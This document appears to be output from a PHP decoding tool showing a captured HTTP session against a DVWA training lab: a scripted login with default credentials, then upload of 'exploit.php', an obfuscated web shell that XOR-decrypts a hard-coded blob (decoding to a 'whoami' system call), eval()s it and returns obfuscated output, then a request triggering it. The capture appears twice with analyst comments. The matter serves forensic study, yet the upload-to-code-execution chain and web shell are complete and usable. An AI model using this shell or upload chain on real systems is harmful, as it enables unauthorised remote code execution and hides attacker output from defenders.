
PHP Decode

GET /vulnerabilities/upload/ HTTP/1.1 Host: www.drsepsforensicsfun.com User-Agent: pytho..

Decoded Output download

GET /vulnerabilities/upload/ HTTP/1.1 
Host: www.drsepsforensicsfun.com 
User-Agent: python-requests/2.22.0 
Accept-Encoding: gzip, deflate 
Accept: */* 
Connection: keep-alive 
Cookie: PHPSESSID=fpq2rs8mf7ad4pdc081hue7fmc 
 
GET /login.php HTTP/1.1 
Host: www.drsepsforensicsfun.com 
User-Agent: python-requesAts/2.22.0 
Accept-Encoding: gzip, deflate 
Accept: */* 
Connection: keep-alive 
Cookie: PHPSESSID=fpq2rs8mf7ad4pdc081hue7fmc 
 
POST /login.php/login.php HTTP/1.1 
Host: www.drsepsforensicsfun.com 
User-Agent: python-requests/2.22.0 
Accept-Encoding: gzip, deflate 
Accept: */* 
Connection: keep-alive 
Cookie: PHPSESSID=fpq2rs8mf7ad4pdc081hue7fmc; security=low 
Content-Length: 88 
Content-Type: application/x-www-form-urlencoded 
 
username=admin&password=password&Login=Login&user_token=6dd623b1d961de480f1b6ec8c44917faGET /login.php/index.php HTTP/1.1 
Host: www.drsepsforensicsfun.com 
User-Agent: python-requests/2.22.0 
Accept-Encoding: gzip, deflate 
Accept: */* 
Connection: keep-alive 
Cookie: PHPSESSID=fpq2rs8mf7ad4pdc081hue7fmc; security=low 
 
GET /vulnerabilities/upload/ HTTP/1.1 
Host: www.drsepsforensicsfun.com 
User-Agent: python-requests/2.22.0 
Accept-Encoding: gzip, deflate 
Accept: */* 
Connection: keep-alive 
Cookie: security=low; PHPSESSID=fpq2rs8mf7ad4pdc081hue7fmc; security=low 
 
GET /dvwa/js/add_event_listeners.js HTTP/1.1 
Host: www.drsepsforensicsfun.com 
User-Agent: python-requests/2.22.0 
Accept-Encoding: gzip, deflate 
Accept: */* 
Connection: keep-alive 
Cookie: PHPSESSID=fpq2rs8mf7ad4pdc081hue7fmc; security=low 
 
POST /vulnerabilities/upload/ HTTP/1.1 
Host: www.drsepsforensicsfun.com 
User-Agent: python-requests/2.22.0 
Accept-Encoding: gzip, deflate 
Accept: */* 
Connection: keep-alive 
Cookie: security=low; PHPSESSID=fpq2rs8mf7ad4pdc081hue7fmc; security=low 
Content-Length: 1284 
Content-Type: multipart/form-data; boundary=7b0932bb9aaddf05434a5ee8bd74524d 
 
--7b0932bb9aaddf05434a5ee8bd74524d 
Content-Disposition: form-data; name="MAX_FILE_SIZE" 
 
100000 
--7b0932bb9aaddf05434a5ee8bd74524d 
Content-Disposition: form-data; name="uploaded" 
 
exploit.php 
--7b0932bb9aaddf05434a5ee8bd74524d 
Content-Disposition: form-data; name="Upload" 
 
Upload 
--7b0932bb9aaddf05434a5ee8bd74524d 
Content-Disposition: form-data; name="uploaded"; filename="exploit.php" 
 
<?php 
/**
 * Encode $data as URL-safe Base64: standard Base64 with '+' and '/' swapped
 * for '-' and '_' and the trailing '=' padding stripped.
 *
 * In this sample it is used only to wrap the XOR-obfuscated command output
 * before it is printed, so the response body is opaque printable text.
 */
function base64url_encode($data) { 
  return rtrim(strtr(base64_encode($data), '+/', '-_'), '='); 
} 
 
/**
 * Decode URL-safe Base64: maps '-' and '_' back to '+' and '/' and calls
 * base64_decode() without its strict flag.
 *
 * Analyst note: the str_pad() target length is strlen($data) % 4, which is
 * never larger than the input length, so no '=' padding is ever added here.
 * Because base64_decode() runs in its default non-strict mode, characters
 * outside the Base64 alphabet (such as a literal '%') are silently discarded
 * instead of causing a failure.
 */
function base64url_decode($data) { 
  return base64_decode(str_pad(strtr($data, '-_', '+/'), strlen($data) % 4, '=', STR_PAD_RIGHT)); 
}  
/**
 * Repeating-key XOR: each byte of $p is XORed with the byte of $k at the same
 * position modulo the key length.
 *
 * The operation is its own inverse, and the script calls it twice with the
 * same key: once to recover the payload and once to obfuscate the output.
 * This is obfuscation only; anyone holding the key string can reverse it.
 *
 * @param string $k key
 * @param string $p input bytes (ciphertext or plaintext)
 * @return string XOR result, same length as $p
 */
function x($k, $p){ 
		$c = ""; 
		$l = strlen($k); 
		$pl = strlen($p); 
		for($i = 0; $i < $pl; $i++) { 
			// Key index wraps around, so the key repeats over the whole input.
			$c .= $k[$i % $l] ^ $p[$i]; 
		} 
		return $c; 
} 
// Analyst summary of the uploaded script body: it decodes a hard-coded blob,
// XOR-decrypts it with a hard-coded key, eval()s the result, and prints the
// captured output XOR-encrypted and base64url-encoded.
// Indicators visible on this page: the key string, the blob, eval() on
// decoded data, and a .php file uploaded through /vulnerabilities/upload/
// that is then requested under /hackable/uploads/.

// Hard-coded 16-character XOR key.
$k = 'bdbd9167c0eedf53'; 
// The command blob is embedded in the file. Nothing visible here reads
// $_POST or php://input, so the identical body of the later POST to
// /hackable/uploads/exploit.php in this capture is not consumed by this code.
$content = "czNwM2hyCg%3D%3D=IhcbF01UWx9BRw0KBQtcEUtf"; 
// Splits on the literal '=' into two fields. The "%3D" sequences stay as
// they are because nothing URL-decodes the string.
$split = explode("=", $content); 
// strcmp() returns 0 when the strings are equal, so this branch runs when the
// decoded first field DIFFERS from 's3p3hr'. Here "czNwM2hyCg" decodes to
// "s3p3hr\n" (trailing newline, plus bytes from the leftover "3D3D"), which
// is not equal, so the branch is taken.
if (strcmp(base64url_decode($split[0]),'s3p3hr')) { 
$decoded = base64url_decode($split[1]); 
		// XOR-decrypting the second field with $k yields: @system("whoami");
		$decrypted = x($k,$decoded); 
		// Buffer everything the evaluated code prints so it can be re-encoded.
		ob_start(); 
		try { 
			// Arbitrary code execution: whatever the blob decrypts to is run as PHP.
			eval($decrypted); 
		} 
		// Class names are case-insensitive, so this catches Exception (not Error).
		catch (exception $e) { 
			print($e->getMessage()); 
		} 
		$o = ob_get_contents(); 
		// The same key obfuscates the captured output ($e is reused for the result).
		$c = x($k, $o); 
		$e = base64url_encode($c); 
		ob_end_clean(); 
		// The response body is a single base64url line, not readable command output.
		print($e . "
"); 
} 
?> 
 
--7b0932bb9aaddf05434a5ee8bd74524d-- 
POST /hackable/uploads/exploit.php HTTP/1.1 
Host: www.drsepsforensicsfun.com 
User-Agent: python-requests/2.22.0 
Accept-Encoding: gzip, deflate 
Accept: */* 
Connection: keep-alive 
Content-Type: application/x-www-form-urlencoded 
Cookie: PHPSESSID=fpq2rs8mf7ad4pdc081hue7fmc; security=low 
Content-Length: 41 
 
czNwM2hyCg%3D%3D=IhcbF01UWx9BRw0KBQtcEUtf


Original Code

GET /vulnerabilities/upload/ HTTP/1.1
Host: www.drsepsforensicsfun.com
User-Agent: python-requests/2.22.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Cookie: PHPSESSID=fpq2rs8mf7ad4pdc081hue7fmc

GET /login.php HTTP/1.1
Host: www.drsepsforensicsfun.com
User-Agent: python-requesAts/2.22.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Cookie: PHPSESSID=fpq2rs8mf7ad4pdc081hue7fmc

POST /login.php/login.php HTTP/1.1
Host: www.drsepsforensicsfun.com
User-Agent: python-requests/2.22.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Cookie: PHPSESSID=fpq2rs8mf7ad4pdc081hue7fmc; security=low
Content-Length: 88
Content-Type: application/x-www-form-urlencoded

username=admin&password=password&Login=Login&user_token=6dd623b1d961de480f1b6ec8c44917faGET /login.php/index.php HTTP/1.1
Host: www.drsepsforensicsfun.com
User-Agent: python-requests/2.22.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Cookie: PHPSESSID=fpq2rs8mf7ad4pdc081hue7fmc; security=low

GET /vulnerabilities/upload/ HTTP/1.1
Host: www.drsepsforensicsfun.com
User-Agent: python-requests/2.22.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Cookie: security=low; PHPSESSID=fpq2rs8mf7ad4pdc081hue7fmc; security=low

GET /dvwa/js/add_event_listeners.js HTTP/1.1
Host: www.drsepsforensicsfun.com
User-Agent: python-requests/2.22.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Cookie: PHPSESSID=fpq2rs8mf7ad4pdc081hue7fmc; security=low

POST /vulnerabilities/upload/ HTTP/1.1
Host: www.drsepsforensicsfun.com
User-Agent: python-requests/2.22.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Cookie: security=low; PHPSESSID=fpq2rs8mf7ad4pdc081hue7fmc; security=low
Content-Length: 1284
Content-Type: multipart/form-data; boundary=7b0932bb9aaddf05434a5ee8bd74524d

--7b0932bb9aaddf05434a5ee8bd74524d
Content-Disposition: form-data; name="MAX_FILE_SIZE"

100000
--7b0932bb9aaddf05434a5ee8bd74524d
Content-Disposition: form-data; name="uploaded"

exploit.php
--7b0932bb9aaddf05434a5ee8bd74524d
Content-Disposition: form-data; name="Upload"

Upload
--7b0932bb9aaddf05434a5ee8bd74524d
Content-Disposition: form-data; name="uploaded"; filename="exploit.php"

<?php
/**
 * URL-safe Base64 encoder: standard Base64, then '+' and '/' replaced with
 * '-' and '_', then trailing '=' padding removed.
 *
 * The script uses it only on the XOR-obfuscated output it prints back.
 */
function base64url_encode($data) {
  return rtrim(strtr(base64_encode($data), '+/', '-_'), '=');
}

/**
 * URL-safe Base64 decoder: restores '+' and '/' and calls base64_decode()
 * in its default non-strict mode.
 *
 * Analyst note: str_pad() is given strlen($data) % 4 as the target length,
 * which can never exceed the input length, so it adds no padding.
 * Non-strict base64_decode() silently drops characters outside the Base64
 * alphabet, which is why a literal '%' in the input does not make it fail.
 */
function base64url_decode($data) {
  return base64_decode(str_pad(strtr($data, '-_', '+/'), strlen($data) % 4, '=', STR_PAD_RIGHT));
} 
/**
 * Repeating-key XOR of $p with $k. The function is its own inverse.
 *
 * The script applies it to the embedded payload before eval() and to the
 * captured output afterwards, with the same key both times. It offers no
 * confidentiality against anyone who has the file, since the key is in it.
 *
 * @param string $k key
 * @param string $p bytes to transform
 * @return string transformed bytes, same length as $p
 */
function x($k, $p){
		$c = "";
		$l = strlen($k);
		$pl = strlen($p);
		for($i = 0; $i < $pl; $i++) {
			// $i % $l cycles through the key bytes.
			$c .= $k[$i % $l] ^ $p[$i];
		}
		return $c;
}
// Analyst summary: a hard-coded blob is base64url-decoded, XOR-decrypted with
// a hard-coded key and passed to eval(). The captured output is then
// XOR-encrypted with the same key and printed as base64url text.
// Review points for responders: the key and blob strings, eval() on decoded
// data, and the upload of a .php file that is later requested under
// /hackable/uploads/.

// Hard-coded 16-character XOR key.
$k = 'bdbd9167c0eedf53';
// The blob is fixed inside the file. No request input is read in the code
// shown, although the follow-up POST in this capture carries the same string.
$content = "czNwM2hyCg%3D%3D=IhcbF01UWx9BRw0KBQtcEUtf";
// Split on the literal '='. "%3D" is not URL-decoded, so it stays in field 0.
$split = explode("=", $content);
// strcmp() is 0 on equality, so the body runs when the decoded tag is NOT
// exactly 's3p3hr'. The tag here decodes to "s3p3hr\n" followed by extra
// bytes, so the condition is true.
if (strcmp(base64url_decode($split[0]),'s3p3hr')) {
$decoded = base64url_decode($split[1]);
		// With this key the second field decrypts to: @system("whoami");
		$decrypted = x($k,$decoded);
		// Capture the evaluated code's output instead of sending it directly.
		ob_start();
		try {
			// Executes the decrypted string as PHP: arbitrary code execution.
			eval($decrypted);
		}
		// Matches Exception (class names are case-insensitive), not Error.
		catch (exception $e) {
			print($e->getMessage());
		}
		$o = ob_get_contents();
		// Output is obfuscated with the same XOR key, and $e is overwritten.
		$c = x($k, $o);
		$e = base64url_encode($c);
		ob_end_clean();
		// The HTTP response therefore carries one base64url-encoded line.
		print($e . "\n");
}
?>

--7b0932bb9aaddf05434a5ee8bd74524d--
POST /hackable/uploads/exploit.php HTTP/1.1
Host: www.drsepsforensicsfun.com
User-Agent: python-requests/2.22.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=fpq2rs8mf7ad4pdc081hue7fmc; security=low
Content-Length: 41

czNwM2hyCg%3D%3D=IhcbF01UWx9BRw0KBQtcEUtf

Function Calls

strtr 1
strlen 1
explode 1
base64url_decode 1

Variables

$k bdbd9167c0eedf53
$data czNwM2hyCg%3D%3D
$split [{'key': None, 'value': 'czNwM2hyCg%3D%3D'}, {'key': None, 'value': 'IhcbF01UWx9BRw0KBQtcEUtf'}]
$content czNwM2hyCg%3D%3D=IhcbF01UWx9BRw0KBQtcEUtf

Stats

MD5 26e9d48bdeb9e454446c2dbed556acd2
Eval Count 0
Decode Time 61 ms